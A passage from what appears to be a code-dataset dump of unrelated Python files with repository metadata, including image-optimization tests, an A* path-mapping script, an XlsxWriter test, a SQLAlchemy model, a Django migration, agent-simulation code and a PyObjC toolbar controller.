            ["test/images/image1.jpg",    {"resize": 96},      (96, 96)],
            # size > image
            ["test/images/image1.jpg",    {"resize": 512},     (256, 256)],
            # width, height
            ["test/images/image1.jpg",    {"resize": "96x200"}, (96, 96)],
            ["test/images/landscape.png", {"resize": [64, 64]}, (64, 32)],
            ["test/images/landscape.png", {"resize": [96, 64]}, (96, 48)],
            ["test/images/landscape.png", {"resize": [96, 32]}, (64, 32)],
            ["test/images/portrait.png",  {"resize": [64, 64]}, (32, 64)],
            ["test/images/portrait.png",  {"resize": [64, 96]}, (48, 96)],
            ["test/images/portrait.png",  {"resize": [32, 96]}, (32, 64)],
            # fmt: on
        ],
    )
    def test_option_resize(self, image_path, options, output_image_size):
        output = io.BytesIO()
        yoga.image.optimize(image_path, output, options)
        output.seek(0)
        image = Image.open(output)
        assert image.width == output_image_size[0]
        assert image.height == output_image_size[1]

    def test_jpeg_quality(self):
        """Lower jpeg_quality must produce a smaller file."""
        output1 = io.BytesIO()
        yoga.image.optimize(
            "test/images/image1.jpg", output1, {"jpeg_quality": 1.00}
        )
        output1.seek(0)
        output2 = io.BytesIO()
        yoga.image.optimize(
            "test/images/image1.jpg", output2, {"jpeg_quality": 0.50}
        )
        output2.seek(0)
        assert len(output2.read()) < len(output1.read())

    def test_webp_quality(self):
        """Lower webp_quality must produce a smaller file."""
        output1 = io.BytesIO()
        yoga.image.optimize(
            "test/images/alpha.lossy.webp", output1, {"webp_quality": 1.00}
        )
        output1.seek(0)
        output2 = io.BytesIO()
        yoga.image.optimize(
            "test/images/alpha.lossy.webp", output2, {"webp_quality": 0.50}
        )
        output2.seek(0)
        assert len(output2.read()) < len(output1.read())

    # opacity_threshold controls the PNG-vs-JPEG decision in "auto" mode.
    @pytest.mark.parametrize(
        "image_path,threshold,format_checker",
        [
            # fmt: off
            ("test/images/alpha.png",     254, is_png),
            ("test/images/alpha.png",     0,   is_jpeg),
            ("test/images/threshold.png", 254, is_png),
            ("test/images/threshold.png", 255, is_png),
            ("test/images/threshold.png", 0,   is_jpeg),
            ("test/images/threshold.png", 230, is_png),
            ("test/images/threshold.png", 229, is_jpeg),
            # fmt: on
        ],
    )
    def test_opacity_threshold(self, image_path, threshold, format_checker):
        output = io.BytesIO()
        yoga.image.optimize(
            image_path,
            output,
            {
                "output_format": "auto",
                "opacity_threshold": threshold,
            },
        )
        output.seek(0)
        assert format_checker(output.read())
# TODO test wrong image / fuzzy inputs
| [
"flo@flogisoft.com"
] | flo@flogisoft.com |
fee04a2ce585c18e0abdd8ac8045c4d1e98b73e8 | 5c8f8e34579f8b2609648b106daed5b313d54ff8 | /2020/In Development/26_1_2020/MappingTest/Test Functions/pathMapping.py | 3dba00bb77d5d8e74bd5ffbc854324ac8a2e2ea7 | [] | no_license | CaithyJo/Compete-with-CoSpace | 357f35dac71599238855d6b3e1bd2a0fdb311244 | cdf3c969a71fe2cf46ec001f0a77d16b968ef4db | refs/heads/master | 2023-03-16T06:06:50.758364 | 2021-01-03T17:13:25 | 2021-01-03T17:13:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,677 | py | from PIL import Image
import sys
sys.path.append('./Python_Libraries/')
from ImageCalculation import *
def standardInputLines():
    """Read lines from standard input until a blank line is entered.

    Returns the collected lines (the terminating blank line excluded).
    """
    collected = []
    while True:
        entry = input()
        if not entry:
            break
        collected.append(entry)
    return collected
def cppInput(x1, y1, x2, y2):
    """Run the external A* solver with the endpoint coordinates.

    Pipes "x1 y1 x2 y2" into AStar/astar.exe and returns its stdout as a
    list of lines (the trailing empty element from split is dropped).
    Assumes astar.exe has been compiled beforehand.
    """
    #os.system("g++ astar.cpp -o astar.exe") #Compile on the spot
    cmd = os.popen(f'cd AStar && echo {x1} {y1} {x2} {y2} | astar.exe').read()
    #cmd = os.popen(f'echo {x1} {y1} {x2} {y2} | ./astar').read()
    lines = cmd.split("\n")
    return lines[:-1]
def inputToCoordinates(lines):
    """Parse whitespace-separated integer rows into a list of int lists.

    E.g. ["1 2", "3 4"] -> [[1, 2], [3, 4]].  An empty line yields [].
    """
    return [[int(token) for token in line.split()] for line in lines]
def addCoordinates(coordinates, pixels, colour):
    """Paint each (x, y) coordinate into a pixel-access object.

    The y axis is flipped (``pixels[x, -y-1]``) — presumably because the map
    origin is bottom-left while the image origin is top-left; TODO confirm.

    Fix over the original: the bare ``except: pass`` wrapped the whole loop,
    so the first out-of-range coordinate silently discarded all remaining
    ones (and also swallowed KeyboardInterrupt/SystemExit).  Failures are
    now handled per coordinate, and only ordinary exceptions are skipped.
    """
    for x, y in coordinates:
        try:
            pixels[x, -y - 1] = colour
        except Exception:
            # Out-of-range/invalid coordinate: skip it, keep drawing the rest.
            continue
def run(mapname="map.txt",pathname="path.txt"):
layout=[]
with open("C:/Users/zunmu/Microsoft Robotics Dev Studio 4/"+mapname) as m:
while True:
data = m.readline()
#print(data)
if data=="":break
data = [int(i) for i in data.split()]
layout = [data]+layout
print(f"Getting Path, {len(layout[1])},{len(layout)}")
lines = []
with open("C:/Users/zunmu/Microsoft Robotics Dev Studio 4/"+pathname) as p:
while True:
data = p.readline()
if data == "":break
lines.append(data)
coordinates = inputToCoordinates(lines)
newMap = switchYValues(mapData(im.size, pixels))
newImg, newPixels = convertBack(layout)
addCoordinates(coordinates, newPixels,(100,100,0))
newImg.show()
import os
from PreprocessedMap import data
if __name__ == '__main__':
    print("Show the Path on the Image")
    print("Make sure to compile astar.cpp into astar.exe first")
    #imageFile = "ZonedGuessed.png"#input('Enter image file: ')
    #im = Image.open(imageFile)
    #im = resizeImage(im, 360)
    #im.show()
    #pixels = im.load()
    # Build the working image from the preprocessed map data.
    im, pixels = convertBack(data)
    print(im.size)
    #lines = standardInputLines()
    # Default endpoints, used only if parsing user input fails below.
    x1, y1, x2, y2 = 125, 95, 256, 211
    try:
        # NOTE(review): the prompt says "x1 y1 x2 y2" but the code splits on
        # commas, so the user must actually type "x1,y1,x2,y2".
        x1, y1, x2, y2 = [int(i) for i in input("Enter coordinates in the form x1 y1 x2 y2:").split(",")]
        lines = cppInput(x1, y1, x2, y2)
        print("Path Length:",len(lines))
        coordinates = inputToCoordinates(lines)
        newMap = switchYValues(mapData(im.size, pixels))
        newImg, newPixels = convertBack(newMap)
        addCoordinates(coordinates, newPixels,(100,100,0))
        newImg.show()
    except:
        # Any failure (bad input, missing astar.exe, ...) falls back to
        # displaying the precomputed map/path files via run().
        print("RUN")
        run()
    #x1, y1 = 30, 30
| [
"zunmun@gmail.com"
] | zunmun@gmail.com |
05cf9539b5593166a6ca2b77fd944d9d536ca31e | c97b9ae1bf06757ba61f90905e4d9b9dd6498700 | /venv/Lib/site-packages/markupsafe/_native.py | f4c3e63ba0250f65ba5bb193a47944e02054786b | [] | no_license | Rahulk1p/image-processor | f7ceee2e3f66d10b2889b937cdfd66a118df8b5d | 385f172f7444bdbf361901108552a54979318a2d | refs/heads/main | 2023-03-27T10:09:46.080935 | 2021-03-16T13:04:02 | 2021-03-16T13:04:02 | 348,115,443 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:2f0b1893e187a0fb0f6e8443fed342ebf8d39828f730bb6c9c3162b3b1e3139d
size 1942
| [
"rksc.k1p@gmail.com"
] | rksc.k1p@gmail.com |
d28849e73d7395237791fdcf7361553e6c5140ce | 3e30e334d759a3606be1dce6dca1154568808d68 | /xlsxwriter/test/comparison/test_autofilter01.py | 0fe9cd39837a51b1f53c5a6cdaa1f4caa5096c36 | [
"BSD-2-Clause-Views"
] | permissive | cimarronm/XlsxWriter | 59668816c4faf5b2e5fc7b96a4ab98d5797891b7 | b440055bebfcc08339bc3e43cc2ce9819a142004 | refs/heads/master | 2021-01-18T10:07:21.729676 | 2014-08-12T23:17:43 | 2014-08-12T23:17:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,652 | py | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2014, John McNamara, jmcnamara@cpan.org
#
import unittest
import os
from ...workbook import Workbook
from ..helperfunctions import _compare_xlsx_files
class TestCompareXLSXFiles(unittest.TestCase):
    """
    Test file created by XlsxWriter against a file created by Excel.
    """

    def setUp(self):
        """Set up the generated/expected file paths for this comparison."""
        self.maxDiff = None

        filename = 'autofilter01.xlsx'

        test_dir = 'xlsxwriter/test/comparison/'
        self.got_filename = test_dir + '_test_' + filename
        self.exp_filename = test_dir + 'xlsx_files/' + filename

        self.txt_filename = test_dir + 'xlsx_files/' + 'autofilter_data.txt'

        # No files/XML elements are excluded from the comparison.
        self.ignore_files = []
        self.ignore_elements = {}

    def test_create_file(self):
        """
        Test the creation of a simple XlsxWriter file with an autofilter.
        This test corresponds to the following examples/autofilter.py example:
        Example 1. Autofilter without conditions.
        """
        filename = self.got_filename

        ####################################################

        workbook = Workbook(filename)
        worksheet = workbook.add_worksheet()

        # Set the autofilter.
        worksheet.autofilter('A1:D51')

        # Open a text file with autofilter example data.
        textfile = open(self.txt_filename)

        # Start writing data from the first worksheet row.
        row = 0

        # Read the text file and write it to the worksheet.
        for line in textfile:
            # Split the input data based on whitespace.
            data = line.strip("\n").split()

            # Convert the number data from the text file.
            for i, item in enumerate(data):
                try:
                    data[i] = float(item)
                except ValueError:
                    # Non-numeric cells are written as strings.
                    pass

            # Write out the row data.
            worksheet.write_row(row, 0, data)

            # Move on to the next worksheet row.
            row += 1

        textfile.close()
        workbook.close()

        ####################################################

        # Compare the generated file against the Excel-created reference.
        got, exp = _compare_xlsx_files(self.got_filename,
                                       self.exp_filename,
                                       self.ignore_files,
                                       self.ignore_elements)

        self.assertEqual(got, exp)

    def tearDown(self):
        # Cleanup: remove the generated workbook.
        if os.path.exists(self.got_filename):
            os.remove(self.got_filename)
# Allow running this comparison test module directly (outside a test runner).
if __name__ == '__main__':
    unittest.main()
| [
"jmcnamara@cpan.org"
] | jmcnamara@cpan.org |
96bd3159f7830d3224ff7077eabb35e57a3d226a | 7f2efccdd6413eb658161c91d75da7c0fe941505 | /catnap/parsers.py | 09befce809b08387315463842f709cef12545631 | [
"BSD-2-Clause"
] | permissive | aehlke/django-catnap | 82b093b9ee07f9edd294dac3e9ff3784fb2ac5cb | 4272cff0de639a65f5cc0fe131370e1531fc2e11 | refs/heads/master | 2016-09-10T15:49:43.799102 | 2016-01-26T03:02:44 | 2016-01-26T03:02:44 | 1,428,424 | 8 | 0 | null | null | null | null | UTF-8 | Python | false | false | 901 | py | # Adapted from https://github.com/tomchristie/django-rest-framework/blob/3d999e4be38f0836063aacdf31d1396fbbb3a5fc/rest_framework/parsers.py
import json
from webob.acceptparse import MIMEAccept
from catnap.exceptions import ParseError
class BaseParser(object):
    """Base class for request-body parsers.

    Subclasses set ``mime_accept`` (a media-type string) and implement
    ``parse``.
    """
    # Media type handled by the parser; overridden by subclasses.
    mime_accept = None

    @classmethod
    def accepts(self, media_type):
        """Return True if this parser can handle ``media_type``.

        NOTE(review): despite the ``self`` name this is a classmethod, so
        the lazily-built MIMEAccept is cached on the class object itself.
        """
        # Strip any parameters (e.g. "; charset=utf-8") before matching.
        media_type = media_type.split(';')[0].strip()
        if not getattr(self, '_mime_accept', None):
            self._mime_accept = MIMEAccept('Accept', self.mime_accept)
        return media_type in self._mime_accept

    def parse(self, request):
        """Parse the request body; must be overridden by subclasses."""
        raise NotImplementedError("Must override the parse method.")
class JsonParser(BaseParser):
    """Parser for ``application/json`` request bodies."""
    mime_accept = 'application/json'

    def parse(self, request):
        """Deserialize the request body as JSON; raise ParseError on failure."""
        try:
            # NOTE(review): the positional ``encoding`` argument matches the
            # old (Python 2-era) json.loads signature this was adapted from —
            # confirm it still works on the targeted Python version.
            return json.loads(request.body, request.encoding)
        except ValueError:
            # json.JSONDecodeError subclasses ValueError, so it is caught too.
            raise ParseError()
| [
"alex.ehlke@gmail.com"
] | alex.ehlke@gmail.com |
88dff878e8a4dabbbde036ca86b56a9e9352c65a | fc79fcfac8a51f35dde0d931cc5b58e9a60498f4 | /sbds/storages/db/tables/operations/virtual/comment_payout_update.py | 167916c8cfb5eb0621aa59c6b0be938019ea5a7f | [
"LicenseRef-scancode-warranty-disclaimer",
"BSD-2-Clause"
] | permissive | Jblew/sbds | 9306ea0fc403a4841be4f3291df309f5f3944f21 | ec1c9cb48d61f78e8a22158b948a50872f44cf51 | refs/heads/master | 2020-03-07T14:55:58.419898 | 2018-03-31T15:55:21 | 2018-03-31T15:55:21 | 127,540,058 | 0 | 0 | null | 2018-03-31T14:37:25 | 2018-03-31T14:37:25 | null | UTF-8 | Python | false | false | 2,649 | py | # -*- coding: utf-8 -*-
import dateutil.parser
from sqlalchemy import DateTime
from sqlalchemy import String
from sqlalchemy import Column
from sqlalchemy import Numeric
from sqlalchemy import Unicode
from sqlalchemy import UnicodeText
from sqlalchemy import Boolean
from sqlalchemy import SmallInteger
from sqlalchemy import Integer
from sqlalchemy import BigInteger
from sqlalchemy import ForeignKeyConstraint
from sqlalchemy import PrimaryKeyConstraint
from sqlalchemy import Index
from sqlalchemy.dialects.postgresql import JSONB
from toolz.dicttoolz import dissoc
import sbds.sbds_json
from ...import Base
from ....enums import operation_types_enum
from ....field_handlers import json_string_field
from ....field_handlers import amount_field
from ....field_handlers import amount_symbol_field
from ....field_handlers import comment_body_field
class CommentPayoutUpdateVirtualOperation(Base):
"""
Steem Blockchain Example
======================
"""
__tablename__ = 'sbds_op_virtual_comment_payout_updates'
__table_args__ = (
ForeignKeyConstraint(['author'], ['sbds_meta_accounts.name'],
deferrable=True, initially='DEFERRED', use_alter=True),)
id = Column(Integer, primary_key=True)
block_num = Column(Integer, nullable=False, index=True)
transaction_num = Column(SmallInteger, nullable=False, index=True)
operation_num = Column(SmallInteger, nullable=False, index=True)
trx_id = Column(String(40),nullable=False)
timestamp = Column(DateTime(timezone=False))
author = Column(String(16)) # steem_type:account_name_type
permlink = Column(Unicode(256), index=True) # name:permlink
operation_type = Column(operation_types_enum,nullable=False,index=True,default='comment_payout_update')
_fields = dict(
)
_account_fields = frozenset(['author',])
def dump(self):
return dissoc(self.__dict__, '_sa_instance_state')
def to_dict(self, decode_json=True):
data_dict = self.dump()
if isinstance(data_dict.get('json_metadata'), str) and decode_json:
data_dict['json_metadata'] = sbds.sbds_json.loads(
data_dict['json_metadata'])
return data_dict
def to_json(self):
data_dict = self.to_dict()
return sbds.sbds_json.dumps(data_dict)
def __repr__(self):
return "<%s (block_num:%s transaction_num: %s operation_num: %s keys: %s)>" % (
self.__class__.__name__, self.block_num, self.transaction_num,
self.operation_num, tuple(self.dump().keys()))
def __str__(self):
return str(self.dump())
| [
"john.gerlock@gmail.com"
] | john.gerlock@gmail.com |
d7f21dc308cc0c1bf12ac7c40b297d3fd7c49832 | cf293781d511de38130049fe92a75c85d5d20da4 | /apps/phonebook/migrations/0004_inviterFK.py | c26962c5f53712e78a89094997b05696efd15ee5 | [] | no_license | jdm/mozillians | e989e044bfc690bbe8d13308ced349125f39c821 | b7a6deb05e33be9b1d025a56a5ddf8a59a9f39ae | refs/heads/master | 2021-01-15T20:28:14.356913 | 2012-01-19T22:36:08 | 2012-01-19T22:36:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,700 | py | # encoding: utf-8
import datetime
from django.db import models
from django.db.utils import IntegrityError
import commonware.log
from south.db import db
from south.v2 import DataMigration
from users.models import UserProfile
log = commonware.log.getLogger('m.migrator')
class Migration(DataMigration):
def forwards(self, orm):
"Write your forwards methods here."
for i in orm.Invite.objects.all():
try:
i.inviter_id = UserProfile.objects.get_by_unique_id(
i.inviter_old).id
if i.redeemer_old:
i.redeemer_id = UserProfile.objects.get_by_unique_id(
i.redeemer_old).id
i.save()
log.debug('Invite %d converted' % i.pk)
except UserProfile.DoesNotExist:
log.warning('Invite %d not converted' % i.pk)
except IntegrityError as e:
if 'redeemer_id' in e.args[1]:
log.warning('Bogus looking invite, deleting %d' % i.pk)
i.delete()
else:
raise
def backwards(self, orm):
"Write your backwards methods here."
# No going back from LDAP
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'groups.group': {
'Meta': {'object_name': 'Group', 'db_table': "'group'"},
'always_auto_complete': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'auto_complete': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'}),
'system': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'url': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'})
},
'phonebook.invite': {
'Meta': {'object_name': 'Invite', 'db_table': "'invite'"},
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inviter': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'invites'", 'null': 'True', 'to': "orm['users.UserProfile']"}),
'inviter_old': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '32', 'db_column': "'inviter'"}),
'recipient': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'redeemed': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'redeemer': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['users.UserProfile']", 'unique': 'True', 'null': 'True'}),
'redeemer_old': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '32', 'db_column': "'redeemer'"})
},
'users.userprofile': {
'Meta': {'object_name': 'UserProfile', 'db_table': "'profile'"},
'bio': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255'}),
'confirmation_code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'display_name': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['groups.Group']", 'symmetrical': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ircname': ('django.db.models.fields.CharField', [], {'max_length': '63', 'blank': 'True'}),
'is_confirmed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_vouched': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'photo': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'}),
'vouched_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['users.UserProfile']", 'null': 'True'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'})
}
}
complete_apps = ['phonebook']
| [
"dd+github@davedash.com"
] | dd+github@davedash.com |
911b89bac770bb745ece42e19bcc10845fea6125 | 6d69b249a81e076d79787dd08eb8957908052052 | /projects/inflection/scripts/bin/dev/version.py | 8543f8ddd73421c12337a62f94f1e268282affb5 | [] | no_license | 2vitalik/wiktionary | 02ee1f1327c3b82fc7b4d7da12083b1431b1eb8b | 8edae2f7dcf9089084c5ce7033c4fb0b454f4dfa | refs/heads/master | 2023-02-06T11:28:41.554604 | 2023-02-05T22:49:01 | 2023-02-05T22:49:01 | 121,025,447 | 7 | 2 | null | 2021-10-13T17:36:32 | 2018-02-10T15:06:24 | Lua | UTF-8 | Python | false | false | 425 | py |
version = '4.5.13'
desc = 'Попытка исправить "старшой" (надеюсь, ничего не сломается другое)'
# todo: почистить старые неиспользуемые модули на ВС (старые имена)
# todo: разные файлы запуска для dev-версии и для prod-версии
# todo: append history changes entry to some page on wikt
| [
"vitaliy.lyapota@anvileight.com"
] | vitaliy.lyapota@anvileight.com |
10150760c6a4c2e0101c502f8885772070e14c6c | 933e89e2d45803ff021cc684b4b78cd2e14a5b15 | /AllBehaviours/GreedyExplore.py | ca7ef5c1053e2d1a2d5139501868e15443fe2aac | [] | no_license | Occy88/MultiAgents | 8123d2718df5f3ad202410097f821c6d69eadd7b | c49d89caf2db49dcc3571d87fa4fb4bade516226 | refs/heads/master | 2022-12-14T18:36:02.343056 | 2021-01-01T13:38:10 | 2021-01-01T13:38:10 | 214,148,130 | 0 | 0 | null | 2022-11-22T04:36:34 | 2019-10-10T10:00:00 | Python | UTF-8 | Python | false | false | 2,309 | py | import vacuumworld
from vacuumworld.vwc import action, direction
import math
from agent_util import AgentPercepts
from agent_util import get_closest_agent
from agent_util import GridDirections
from agent_util import get_cam_detections
from agent_util import CommunicationKeys
from agent_util import GridState
import random
import json
# import numpy as np
class GreedyExplore:
"""
Agent has a state of the map with
values in each cell representing how many
cycles ago they were explored.
Greedy explore directs the agent towards the most expensive node
if another agent is nearer to the node (via the tie break function)
n e.g. 10 points are taken away from the node
"""
def __init__(self):
# required params
self.message = {}
self.messages = []
# it's fine to redeclare just to get the functions while programming.
self.grid_state = GridState()
self.orientation = 'none'
self.position = (-1, -1)
# penalty if other agent is closer:
self.penalty = 20
# penalty for points on an edge
def run(self):
print("==================GREEDILY EXPLORING===============")
adjusted = self.get_adjusted()
self.choose_max(adjusted)
def get_adjusted(self):
price_matrix = []
i = 0
agents = []
for y, li in enumerate(self.grid_state.locations):
price_matrix.append([])
for x, p in enumerate(li):
price_matrix[y].append(p.age)
if p.agent is not None:
agents.append((p.agent, (x, y)))
for y, li in enumerate(price_matrix):
for x, p in enumerate(li):
closest_agent=get_closest_agent(agents,(x,y))
# print(self.name,closest_agent[0])
if self.name==closest_agent[0][0]:
price_matrix[y][x] -= self.penalty
# price_matrix=np.array(price_matrix)
# print(price_matrix)
return price_matrix
def choose_max(self, price_matrix):
max = 0
# choose a max
for y, l in enumerate(price_matrix):
for x, p in enumerate(l):
if p > max:
max = p
self.target_position = (x, y)
| [
"octavio.delser@gmail.com"
] | octavio.delser@gmail.com |
ee5cef4c42b866c99b6379512fec4733153ba628 | 34d5ebe9e6de9d6742c234dabfa9b38f0adb7774 | /carriage_return/dm.py | 646e2bf2b6a0ecb6d28c26fc2dcef2ed447891c6 | [] | no_license | campagnola/return-to-carriage | f37acaf8e41ccf04e7089018574732a1fdcd2a64 | eeb7f31b16e2c236c875c867a0295173fa6f4b0a | refs/heads/master | 2021-08-05T14:02:49.988526 | 2021-07-31T08:38:17 | 2021-07-31T08:38:17 | 84,014,684 | 0 | 2 | null | 2021-07-30T02:48:13 | 2017-03-06T00:55:55 | Python | UTF-8 | Python | false | false | 1,090 | py |
class DungeonMaster:
"""Responsible for managing turns, accepting requests to change the world state, and
deciding what actual changes to make.
"""
def __init__(self, scene):
self.scene = scene
def request_player_move(self, player, newpos):
"""Attempt to move the player to newpos.
"""
pos = player.location.slot
j, i = newpos
j0, i0 = player.location.slot
if self.scene.maze.blocktype_at(i, j)['walkable']:
self.move_player(player, newpos)
elif self.scene.maze.blocktype_at(i0, j)['walkable']:
newpos[1] = i0
self.move_player(player, newpos)
elif self.scene.maze.blocktype_at(i, j0)['walkable']:
newpos[0] = j0
self.move_player(player, newpos)
self.norm_light = None
def move_player(self, player, pos):
player.location.update(self.scene.maze, pos)
self.end_turn()
def end_turn(self):
for mlist in list(self.scene.monsters.values()):
for m in mlist:
m.take_turn()
| [
"luke.campagnola@gmail.com"
] | luke.campagnola@gmail.com |
351320168f45d58e0903ed4baddef25e5b8579a3 | 1577e1cf4e89584a125cffb855ca50a9654c6d55 | /pyobjc/pyobjc/pyobjc-framework-Cocoa-2.5.1/Examples/AppKit/CocoaBindings/TableModelWithSearch/ToolbarCreator.py | e19e19ca5fce6827a2c200a9aca211088ffb0281 | [
"MIT"
] | permissive | apple-open-source/macos | a4188b5c2ef113d90281d03cd1b14e5ee52ebffb | 2d2b15f13487673de33297e49f00ef94af743a9a | refs/heads/master | 2023-08-01T11:03:26.870408 | 2023-03-27T00:00:00 | 2023-03-27T00:00:00 | 180,595,052 | 124 | 24 | null | 2022-12-27T14:54:09 | 2019-04-10T14:06:23 | null | UTF-8 | Python | false | false | 3,785 | py | #
# ToolbarCreator.py
# TableModelWithSearch
#
# Created by Bill Bumgarner on Sun Apr 04 2004.
# Copyright (c) 2004 __MyCompanyName__. All rights reserved.
#
from Cocoa import *
kToolbarIdentifier = "TableModel Toolbar Identifier"
kSearchFieldItemIdentifier = "TableModel Search Field Identifier"
from FilteringArrayController import kLiteralSearch, kRegularExpressionSearch
class ToolbarCreator (NSObject):
filteringArrayController = objc.IBOutlet()
searchField = objc.IBOutlet()
window = objc.IBOutlet()
def awakeFromNib(self):
self.toolbarItemCache = {}
# create toolbar containing search field
toolbar = NSToolbar.alloc().initWithIdentifier_(kToolbarIdentifier)
toolbar.setDelegate_(self)
toolbar.setAllowsUserCustomization_(True)
toolbar.setAutosavesConfiguration_(True)
searchFieldItem = NSToolbarItem.alloc().initWithItemIdentifier_(kSearchFieldItemIdentifier)
self.searchFieldItem = searchFieldItem
searchFieldItem.setLabel_("Search")
searchFieldItem.setPaletteLabel_("Search Field")
searchFieldItem.setToolTip_("Search")
searchFieldItem.setView_(self.searchField)
searchFieldItem.setMinSize_(self.searchField.bounds().size)
maxSize = self.searchField.bounds().size
maxSize.width = maxSize.width + 150
searchFieldItem.setMaxSize_(maxSize)
self.toolbarItemCache[kSearchFieldItemIdentifier] = searchFieldItem
self.window.setToolbar_(toolbar)
cellMenu = NSMenu.alloc().initWithTitle_(u'Search Menu')
# note, bottom up!
for v in [kRegularExpressionSearch, kLiteralSearch]:
item = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_(v, 'changeSearchType:', u'')
item.setRepresentedObject_(v)
item.setTarget_(self)
cellMenu.insertItem_atIndex_(item, 0)
self.searchField.cell().setSearchMenuTemplate_(cellMenu)
# this better be the kLiteralSearch menu item
self.changeSearchType_(item)
@objc.IBAction
def changeSearchType_(self, sender):
obj = sender.representedObject()
self.searchField.cell().setPlaceholderString_(obj)
self.searchField.setStringValue_(u'')
self.filteringArrayController.changeSearchType_(obj)
def toolbarDefaultItemIdentifiers_(self, aToolbar):
return [
kSearchFieldItemIdentifier,
NSToolbarFlexibleSpaceItemIdentifier,
NSToolbarSeparatorItemIdentifier,
NSToolbarCustomizeToolbarItemIdentifier,
]
def toolbarAllowedItemIdentifiers_(self, aToolbar):
return [
kSearchFieldItemIdentifier,
NSToolbarFlexibleSpaceItemIdentifier,
NSToolbarSpaceItemIdentifier,
NSToolbarSeparatorItemIdentifier,
NSToolbarPrintItemIdentifier,
NSToolbarCustomizeToolbarItemIdentifier,
]
def toolbar_itemForItemIdentifier_willBeInsertedIntoToolbar_(self, toolbar, itemIdentifier, flag):
newItem = NSToolbarItem.alloc().initWithItemIdentifier_(itemIdentifier)
item = self.toolbarItemCache[itemIdentifier]
newItem.setLabel_( item.label() )
newItem.setPaletteLabel_( item.paletteLabel() )
if item.view():
newItem.setView_( item.view() )
else:
newItem.setImage_( item.image() )
newItem.setToolTip_( item.toolTip() )
newItem.setTarget_( item.target() )
newItem.setAction_( item.action() )
newItem.setMenuFormRepresentation_( item.menuFormRepresentation() )
if newItem.view():
newItem.setMinSize_( item.minSize() )
newItem.setMaxSize_( item.maxSize() )
return newItem
| [
"opensource@apple.com"
] | opensource@apple.com |
